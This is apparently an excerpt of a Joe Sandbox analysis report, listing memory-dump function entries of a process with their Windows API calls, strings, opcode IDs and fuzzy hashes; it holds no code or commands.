                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                                                                          • API String ID: 3069159798-905460609
                                                                                                                                                                                                                                                                                          • Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                                                                                                                                          • Instruction ID: 759414cee2d090ed8fb9b867b2e638d97b6c051f21cd9899da6c3669ae467268
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D917C26A0C74285EBACBF22D4422AD63A4EF44B84F445132DE5CA77E5EF3CE555E340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2591520935-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                                                                                                                                          • Instruction ID: aaac35eb5750814d50385342e18788e53432eb4e77e8dd3a071a4cfeee355150
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B714722F1C64289FBA9FF62D8526BC23A4BF44748F544535CA1DA36D5EF3CA845E310
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                                                                                                                                          • Instruction ID: 86d53e2db6cc92139157921019b9b83d05038314a140671f148b49b3bebc7f4d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631507260DB8286EBA0AF60E8813ED7364FB84744F44403ADA4E97BD5DF78D649C710
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                                                                                                                                          • Instruction ID: aadaf61f9b6e081edb445301f15da9368b68c9b2962030546f2c1c8da906127e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31533260CB8186DBA0EF25E8412AE73A4FB85754F500136EE8D97BA5DF3CD546CB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: ' is not a number.
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-698141950
                                                                                                                                                                                                                                                                                          • Opcode ID: 6fe4ff8f585701c86da8c867bb3c9c85db543fd1f3799b5e0abbe7abe3d6ccda
                                                                                                                                                                                                                                                                                          • Instruction ID: 63e3c904b744804fcb1710507be7f1253842dc91153c7836574a865d0886f93f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe4ff8f585701c86da8c867bb3c9c85db543fd1f3799b5e0abbe7abe3d6ccda
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCD1E262E18B8285EB10EF64D8413ED7760FB95798F509236EE5C63ADADF38D181D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF643F623CB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                          • API String ID: 389471666-631824599
                                                                                                                                                                                                                                                                                          • Opcode ID: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                                                                                                                                          • Instruction ID: 24606a74246486bc2bcc519f5dce67c0403803dd0307fe0acbf8720e8ba3f75c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1596f6ca38e6fed48fde224f6c62878a643fdc611c776942bb091bdbc39c011d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7112B32618B82A6E784BF62D6563B932A5FF44344F405135CA4D93AA0EF7CE4A8D710
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E
                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F4FD57
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
                                                                                                                                                                                                                                                                                          • API String ID: 4131450254-2107479676
                                                                                                                                                                                                                                                                                          • Opcode ID: 2a2ab2c3f64ccb906fca6c33ab773da500c7988fe9955a56a7d70a0e634df760
                                                                                                                                                                                                                                                                                          • Instruction ID: 030805b08db8edc5ecb3f872a6e5bc84fc7ce9a17a9a1f54bfe91404b352b009
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a2ab2c3f64ccb906fca6c33ab773da500c7988fe9955a56a7d70a0e634df760
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D18162A0CB4282EAA4FB15E55237EA3A1FBA5B84F405131DB8E93BD5DF3CE541D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1791019856-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                                                                                                                                          • Instruction ID: 259782896f0af6baf9c0afed78d906ace7fced31eb9b48c2e2ea2aa75d5855b9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8615B32A0C64286EBA8BF12E54226963A1FB44745F948135DB9DE36D5DF3CE451E700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                          • Opcode ID: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                                                                                                                                          • Instruction ID: b85201ba6ee142bc9cae6d15f557ca5d2d59c280270cbd7a47425adfcc600efc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08016221B0DB41C5EB84BF56B4424AAA764EF98BD0F984036DE4DA3BE5CF3CE5419740
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                                                                                                                                          • Instruction ID: 553880ddc86228e3598fa3426644b11a4168bdefdb66a9a9e874b2c7c5952d47
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF51F622B0868255FBA8BB72E8416AE7BA1BB40794F444135EE9CB7BD9CF3CD001D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue$InfoLocale
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 673564084-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                                                                                                                                          • Instruction ID: a0d0177cbfffb3f8bc677a7285b1f49cf1f4995d537ca1e984bb38c1647225aa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9315032A0C68286EBACFB22E4427AA63A1FB84784F548135DA4DD36D5DF3CE4559740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033
                                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF643F8484F,?,00000000,00000092,?,?,00000000,?,00007FF643F74DC1), ref: 00007FF643F840FE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3029459697-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                                                                                                                                          • Instruction ID: cc32921835b57da24e63e93650fdcccf90c863ada8e6b0a59e1cf37c53210a9e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0110267E0C645CAEB99BF17D4412AA7BA0FB50BA0F548131C669933D0CF28D5E1D740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033
                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,?,00007FF643F843C2), ref: 00007FF643F8464F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocaleValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3796814847-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                                                                                                                                          • Instruction ID: b09903d87437101fb4c63920a7adc68edc23962dc0e161557ea1df086be4b3cc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD112B32B1C55282E7ACBF26A05667AA290EB40764F644631D62DA7AC0DF29D8819700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033
                                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF643F8480B,?,00000000,00000092,?,?,00000000,?,00007FF643F74DC1), ref: 00007FF643F841AE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3029459697-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                                                                                                                                          • Instruction ID: 4cc828080a81447b5a119e93c2e07c23876e55426b28a42d4b16697387d349db
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c556c0bea6b83112df6ab32f4da6f1a2c3745ef5e59afe02ddedd8d95d463359
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E301F562F0C68286E79D7F17E8417B976A1EB607A4F518231D639936D4DF289481A700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF643F78D1B,?,?,?,?,?,?,?,?,00000000,00007FF643F836B0), ref: 00007FF643F788C3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
                                                                                                                                                                                                                                                                                          • Instruction ID: 183be5ca5f85b1dfa53d143cfb8367c0000c3a95aa7b9d0df6faa9196c217050
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580ba48c80ce648dc1850835b2af7c4fe86649764c2b91a200ae029b4e583e33
